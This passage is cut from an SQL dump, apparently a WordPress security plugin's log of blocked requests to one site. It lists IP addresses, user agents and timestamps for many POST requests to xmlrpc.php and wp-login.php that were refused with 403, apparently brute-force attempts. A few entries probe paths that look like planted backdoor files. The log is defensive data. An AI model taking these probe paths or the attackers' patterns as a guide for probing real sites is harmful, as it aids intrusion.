Safari\\/537.36\"}','c7keRgGnObhABzt53I6pVCv9',0,1664412392.8111,1002,'','POST',403,0,515,0,1,'',0),('162.0.220.27',2717965339,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/87.0.4280.88 Safari\\/537.36\"}','LsqvZpIPa2OkcfxVEFWgwRHK',0,1664412392.9026,989,'','POST',403,0,515,0,1,'',0),('186.64.119.120',3124787064,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','4NHxYa6gzyFViWbGjlSfK3RD',0,1664412924.9429,14862,'','POST',403,0,515,0,1,'',0),('195.93.152.83',3277690963,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','AdKLu0RaN9HVCEiBIOf3j1nF',0,1664413536.7403,18705,'','POST',403,0,515,0,1,'',0),('103.171.181.142',1739306382,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','IPXt93T61GjKfAB04lCQrEoi',0,1664413684.6752,1423,'','POST',403,0,515,0,1,'',0),('68.183.26.89',1152850521,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.132 Safari\\/537.36\"}','sYzxEK1WHNLGZU0IVy7RliA6',0,1664413712.5938,1229,'','POST',403,0,515,0,1,'',0),('194.244.133.254',3270804990,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.163 Safari\\/537.36\"}','iQAgHq8E5YvwLkTPafSxKMI4',0,1664413712.6963,1205,'','POST',403,0,515,0,1,'',0),('185.58.73.254',3107604990,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko\\/20100101 Firefox\\/18.0\"}','1gAcHtVrx98JCe4TwsLNKPWh',0,1664413724.7062,1406,'','POST',403,0,515,0,1,'',0),('172.105.49.155',2892575131,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/72.0.3626.121 Safari\\/537.36\"}','p0e8aKfZOzUHxhvkBAEl4tos',0,1664413726.1091,1418,'','POST',403,0,515,0,1,'',0),('194.244.133.254',3270804990,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.105 Safari\\/537.36\"}','Dxgh38IKC0Sbk4YFMoeGtOLs',0,1664413725.1843,2547,'','POST',403,0,515,0,1,'',0),('92.205.10.44',1556941356,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/86.0.4240.198 Safari\\/537.36\"}','qQAbTF9Gwd1SivjKs3Cx06R2',0,1664413731.3086,506,'','POST',403,0,515,0,1,'',0),('201.236.28.16',3387694096,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\"}','bdHD5NXylfegG3WJLMkcF0TV',0,1664413734.8496,479,'','POST',403,0,515,0,1,'',0),('201.236.28.16',3387694096,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.93 Safari\\/537.36\"}','uk2Jv5TxDtGzbZOYhRIdeAVw',0,1664413738.0439,672,'','POST',403,0,515,0,1,'',0),('66.33.205.144',1109511568,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko\\/20100101 Firefox\\/67.0\"}','s1hvFZxn9tyW7EORHgdCYucM',0,1664413742.6745,563,'','POST',403,0,515,0,1,'',0),('43.153.25.22',731453718,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Safari\\/537.36\"}','8hqRkBKU1suteS0pAEFVY2In',0,1664413744.3468,546,'','POST',403,0,515,0,1,'',0),('139.99.69.189',2338538941,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','u9328mC7loYkNFKbjAXDREiS',0,1664414468.0487,19560,'','POST',403,0,515,0,1,'',0),('152.89.196.13',2556019725,'','https://cteisys.com/wp-includes/class-wordpress-cloud.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10.14; rv:68.0) Gecko\\/20100101 Firefox\\/68.0\"}','26Xwrm1hk3DbtCpz5SojesUL',0,1664414819.1402,11826,'','POST',403,0,700,0,1,'',0),('104.254.90.243',1761499891,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','IKZHJugljLEv7DGehVa0W4C9',0,1664415203.5664,18181,'','POST',403,0,515,0,1,'',0),('38.242.205.84',653446484,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','z1KHFVfan0QSRdoOrpkx5t9B',0,1664415222.6208,560,'','POST',403,0,515,0,1,'',0),('213.152.162.10',3583549962,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','zjZ5lELwqtIC4hQXikmHFKA8',0,1664415544.3429,18857,'','POST',403,0,515,0,1,'',0),('20.239.161.138',351248778,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/78.0.3904.108 Safari\\/537.36\"}','m87WUoZ5aMj0RGnDbNAHJ2IV',0,1664415729.3951,9689,'','POST',403,0,515,0,1,'',0),('176.9.113.101',2953408869,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/69.0.3497.100 Safari\\/537.36\"}','tZFWKHblyJhgGN3AEOowP5ui',0,1664415721.0747,18137,'','POST',403,0,515,0,1,'',0),('31.11.36.185',520823993,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\"}','ZaybAQPmdvlLYESojR0e9wGK',0,1664415739.9431,579,'','POST',403,0,515,0,1,'',0),('173.44.60.148',2905357460,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; rv:7.0.1) Gecko\\/20100101 Firefox\\/7.0.1\"}','hi2qn4YmXtvgH5ORukMWLrIe',0,1664415746.9680,499,'','POST',403,0,515,0,1,'',0),('201.236.28.16',3387694096,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko\\/20050716 Firefox\\/1.0.6\"}','Y80dNqaIxVrgc46kyB352OTh',0,1664415760.7496,517,'','POST',403,0,515,0,1,'',0),('62.234.92.73',1055546441,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; rv:30.0) Gecko\\/20100101 Firefox\\/30.0\"}','FwtTa0JzP6YQ5UXNokqLDfMC',0,1664415767.7076,1200,'','POST',403,0,515,0,1,'',0),('51.89.228.130',861529218,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko\\/20100101 Firefox\\/41.0\"}','swPihtJKj74e2uYW3cdTFlv6',0,1664415767.1100,1807,'','POST',403,0,515,0,1,'',0),('66.33.205.144',1109511568,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/72.0.3626.121 Safari\\/537.36\"}','MZznyx4iCg136rdtXa5EpjeJ',0,1664415786.3859,1779,'','POST',403,0,515,0,1,'',0),('213.152.161.69',3583549765,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','8hj3ecSnJ6K7zirtCbl4Dx9W',0,1664416297.2974,14497,'','POST',403,0,515,0,1,'',0),('101.0.73.142',1694517646,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','P4uZOhTvR3ocyS1IH9BFUaj5',0,1664416566.2049,19092,'','POST',403,0,515,0,1,'',0),('119.8.58.8',1997027848,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) Chrome\\/92.0.4515.159 Safari\\/537.36\"}','56IwN1tcfvLTGbJPVDYiakj8',0,1664416748.6513,6894,'','POST',403,0,515,0,1,'',0),('37.120.132.83',628655187,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','jLkxYwDPWB6q3lmR2yQdgEKX',0,1664417184.2683,19213,'','POST',403,0,515,0,1,'',0),('67.222.142.146',1138658962,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','YJ7HLWsDbtimqBn5fgN3o8kF',0,1664417359.9616,3704,'','POST',403,0,515,0,1,'',0),('209.141.48.210',3515691218,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (iPhone; CPU iPhone OS 7_1_1 like Mac OS X) AppleWebKit\\/537.51.2 (KHTML, like Gecko) Version\\/7.0 Mobile\\/11D201 Safari\\/9537.53\"}','FJqyonuNzvTLBE3DXQO7dVeP',0,1664417954.2127,1416,'','POST',403,0,600,0,1,'',0),('104.194.10.231',1757547239,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','mc5oe6YTlIFHKMzE4jBOCAQb',0,1664418135.4013,18646,'','POST',403,0,515,0,1,'',0),('35.194.233.240',599976432,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','M1K3CFdPoVOAWNYHzur6vJna',0,1664418906.1675,18466,'','POST',403,0,515,0,1,'',0),('162.0.220.27',2717965339,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; rv:33.0) Gecko\\/20100101 Firefox\\/33.0\"}','ENHuJhti1wnqlWBp8zoYymMd',0,1664418944.7870,940,'','POST',403,0,515,0,1,'',0),('104.37.174.38',1747299878,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko\\/20100101 Firefox\\/67.0\"}','qVRUFcm69MW8ZnsSL3THK4br',0,1664418945.4056,1600,'','POST',403,0,515,0,1,'',0),('201.236.28.16',3387694096,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; rv:7.0.1) Gecko\\/20100101 Firefox\\/7.0.1\"}','fFj5KiN7XRStr2uVDLg3veJP',0,1664418951.7649,610,'','POST',403,0,515,0,1,'',0),('167.71.184.141',2806495373,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/89.0.4389.90 Safari\\/537.36\"}','eJ1fS9wKMnibhokYRZXQGN5D',0,1664418955.3539,545,'','POST',403,0,515,0,1,'',0),('204.93.193.216',3428696536,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; LM-X420) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','9807kRXUuTijmNIKtve12HhS',0,1664418956.5836,596,'','POST',403,0,515,0,1,'',0),('79.139.60.88',1334525016,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/78.0.3904.108 Safari\\/537.36\"}','riLsZncBJyIlQhMezmDGxFa0',0,1664418963.5348,556,'','POST',403,0,515,0,1,'',0),('212.91.94.100',3562757732,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/74.0.3729.157 Safari\\/537.36\"}','a4XfR9UQ8LPweAbd0tk3rZoB',0,1664418966.3496,539,'','POST',403,0,515,0,1,'',0),('178.239.172.7',3002051591,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; LM-X420) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','uDrxpG7hZmfFVESgXPAdOc14',0,1664418970.3930,602,'','POST',403,0,515,0,1,'',0),('68.183.26.89',1152850521,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/68.0.3440.106 Safari\\/537.36\"}','6gDNlrumCRpAq9bXL02Bd7kH',0,1664418974.2563,639,'','POST',403,0,515,0,1,'',0),('185.107.113.160',3110826400,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.113 Safari\\/537.36\"}','NmyOqzjltI3P5v8x7Juf9HsV',0,1664418990.6753,621,'','POST',403,0,515,0,1,'',0),('185.183.122.143',3115809423,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','OwtEyfJHMlsLVvjSBKc3Z7px',0,1664419119.9329,9606,'','POST',403,0,515,0,1,'',0),('190.92.159.48',3193741104,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','VUPjqz4FR601oJHhfbQe95r3',0,1664419727.3899,18848,'','POST',403,0,515,0,1,'',0),('3.131.4.125',58918013,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','XUrJtxEFpl0vOe5s93fGnTIB',0,1664419904.9579,12390,'','POST',403,0,515,0,1,'',0),('89.163.146.52',1503892020,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/74.0.3729.131 Safari\\/537.36\"}','XxlghdnJcWaZPsKFB1yLT0ti',0,1664420295.8623,17887,'','POST',403,0,515,0,1,'',0),('201.236.28.16',3387694096,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.132 Safari\\/537.36\"}','jgHOhF78a5zR4nTMvVXqxGZs',0,1664420297.4821,16404,'','POST',403,0,515,0,1,'',0),('82.165.86.198',1386567366,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/57.0.2987.133 Safari\\/537.36\"}','b74Yiyf5T9dstwhLrj6vzU1p',0,1664420304.1262,9780,'','POST',403,0,515,0,1,'',0),('66.33.205.144',1109511568,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; SM-A205U) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','7dOMipoF25JQNHCh1D3esWX4',0,1664420319.0150,597,'','POST',403,0,515,0,1,'',0),('223.165.66.70',3752149574,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:60.0) Gecko\\/20100101 Firefox\\/60.0\"}','8nRh0tsPGIfAZMDamy9o7pXj',0,1664420321.0019,538,'','POST',403,0,515,0,1,'',0),('43.153.25.22',731453718,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; SM-A102U) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','i4XyCcfDZ9xtnoPblJ8gSV7w',0,1664420324.8386,598,'','POST',403,0,515,0,1,'',0),('37.251.155.62',637246270,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; rv:36.0) Gecko\\/20100101 Firefox\\/36.0\"}','ivLhaJgj9bHOkDFlC7xoRtuq',0,1664420339.8049,1258,'','POST',403,0,515,0,1,'',0),('192.249.124.141',3237575821,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; rv:17.0) Gecko\\/20100101 Firefox\\/20.6.14\"}','nYsWTFNXtMzA4IOkeguwo93R',0,1664420344.7384,556,'','POST',403,0,515,0,1,'',0),('193.176.230.188',3249596092,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','5iQmbHyRqn1MdhPolCV3JwAj',0,1664420712.9154,4810,'','POST',403,0,515,0,1,'',0),('194.233.69.10',3270067466,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','Mih5FNrTXoDexKQkuOAJBEd4',0,1664421248.9618,18600,'','POST',403,0,515,0,1,'',0),('162.241.115.107',2733732715,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','1cDM6Hkzq9gF3eGvYyUCsLRb',0,1664421419.3810,9965,'','POST',403,0,515,0,1,'',0),('199.201.110.199',3351867079,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','pvP5OeMD8BaIVZL749qozf6C',0,1664421844.7809,18604,'','POST',403,0,515,0,1,'',0),('198.38.88.250',3324401914,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','12zpdPUYHk7Dyw8rqKIhbnXZ',0,1664422342.0976,19299,'','POST',403,0,515,0,1,'',0),('160.16.210.199',2685457095,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:58.0) Gecko\\/20100101 Firefox\\/58.0\"}','WxEZrnvJMDC2eotwQO3pb8K0',0,1664422396.8034,1452,'','POST',403,0,515,0,1,'',0),('97.74.82.165',1632260773,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/74.0.3729.169 Safari\\/537.36\"}','4pQOcMH5eytiKRqPvkxGsD12',0,1664422407.6452,484,'','POST',403,0,515,0,1,'',0),('222.124.3.203',3732669387,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Safari\\/537.36\"}','znEuANBaOf6LW3GVoTR1Ic7r',0,1664422411.7294,498,'','POST',403,0,515,0,1,'',0),('5.61.28.93',87891037,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko\\/20100101 Firefox\\/67.0\"}','5YiBgQL70haVlu9jUkR8tT6D',0,1664422433.7255,1255,'','POST',403,0,515,0,1,'',0),('178.210.84.161',3000128673,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/72.0.3626.121 Safari\\/537.36\"}','SqZpBHUGA0FyRoIaOiV34rLf',0,1664422433.0330,2062,'','POST',403,0,515,0,1,'',0),('40.127.3.88',679412568,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/69.0.3497.100 Safari\\/537.36\"}','0uRX1EKYSnWCA5g9DbUBejMG',0,1664422439.9413,1550,'','POST',403,0,515,0,1,'',0),('103.8.12.105',1728580713,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/87.0.4280.88 Safari\\/537.36\"}','CxqpDFTry0bauhIXZ7RfQLYv',0,1664422442.1520,522,'','POST',403,0,515,0,1,'',0),('186.234.80.231',3135918311,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','1kcNTiF0IMf25VDuLwyY8GOS',0,1664422795.9074,2498,'','POST',403,0,515,0,1,'',0),('162.241.225.246',2733761014,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','IAfUSdLrZOJVcgQiC93816v0',0,1664422933.2586,1422,'','POST',403,0,515,0,1,'',0),('152.89.196.13',2556019725,'','https://cteisys.com/wp-includes/class-index-wordpress.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko\\/20100101 Firefox\\/67.0\"}','Tlbzvq7gZHJtENRF3kSB6A04',0,1664423207.5919,11856,'','POST',403,0,700,0,1,'',0),('139.99.69.189',2338538941,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','ThOywkF2JeNPXBA7gCtZSbL8',0,1664423226.3521,7507,'','POST',403,0,515,0,1,'',0),('213.165.237.48',3584421168,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','Z5knyO9leH8Ua2wBSsh7mXzY',0,1664423326.8060,16295,'','POST',403,0,515,0,1,'',0),('67.20.114.155',1125413531,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','qV9TWybdtMBKRODHlNkcPL5j',0,1664423725.1770,18536,'','POST',403,0,515,0,1,'',0),('152.89.196.13',2556019725,'','https://cteisys.com/wp-content/plugins/wp-members-master/widget-tag.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10.14; rv:68.0) Gecko\\/20100101 Firefox\\/68.0\"}','XGqbEiwS6FIKpcOLzoQZPj1A',0,1664423994.0238,12476,'','POST',403,0,700,0,1,'',0),('128.199.108.205',2160553165,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','1ITHXcLhOwjWn2rCfiRoYM6Q',0,1664424346.8151,20098,'','POST',403,0,515,0,1,'',0),('193.112.202.112',3245394544,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','4yVWDqdscfgYEiSB8eGRnjz7',0,1664424422.7291,18418,'','POST',403,0,515,0,1,'',0),('185.102.88.47',3110492207,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; SM-N960U) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','qjuiOHvsP4yn2ZRl180hWCQJ',0,1664424545.0709,17631,'','POST',403,0,515,0,1,'',0),('201.236.28.16',3387694096,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; SM-A205U) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','HswNSax28uWzXIeBbD0ZJFdV',0,1664424546.1412,16653,'','POST',403,0,515,0,1,'',0),('212.91.94.100',3562757732,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.5) Gecko\\/20041107 Firefox\\/1.0\"}','F5PRniaK1wpMXJZEgLY9rmHo',0,1664424556.9524,6082,'','POST',403,0,515,0,1,'',0),('47.241.3.166',804324262,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.113 Safari\\/537.36\"}','PC67RfG0ospIFzXOZ3eMSTKV',0,1664424567.2661,564,'','POST',403,0,515,0,1,'',0),('194.244.133.254',3270804990,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; SM-N960U) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','Yp9KU3twiDqHLI1PCFdENeGA',0,1664424569.2713,595,'','POST',403,0,515,0,1,'',0),('82.165.86.16',1386567184,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.0; rv:34.0) Gecko\\/20100101 Firefox\\/34.0\"}','awdBjz9W2AsYvMONxifekrQo',0,1664424573.7680,523,'','POST',403,0,515,0,1,'',0),('92.205.10.44',1556941356,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:60.0) Gecko\\/20100101 Firefox\\/60.0\"}','J9i5eKdlNMAwsurPYCGZ1Lkx',0,1664424577.4671,609,'','POST',403,0,515,0,1,'',0),('82.165.88.207',1386567887,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/64.0.3282.186 Safari\\/537.36\"}','hxJL1Ev3Z4KOb5NSaIqAeX0P',0,1664424585.0634,627,'','POST',403,0,515,0,1,'',0),('60.205.227.183',1020126135,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/57.0.2987.133 Safari\\/537.36\"}','uFB2xerLlRvjYXJd35INM7zE',0,1664424585.9415,1500,'','POST',403,0,515,0,1,'',0),('68.183.26.89',1152850521,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; SM-A102U) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','D35d24QxvFHsUL0ayekV6AMj',0,1664424594.1637,591,'','POST',403,0,515,0,1,'',0),('51.89.228.130',861529218,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko\\/20100101 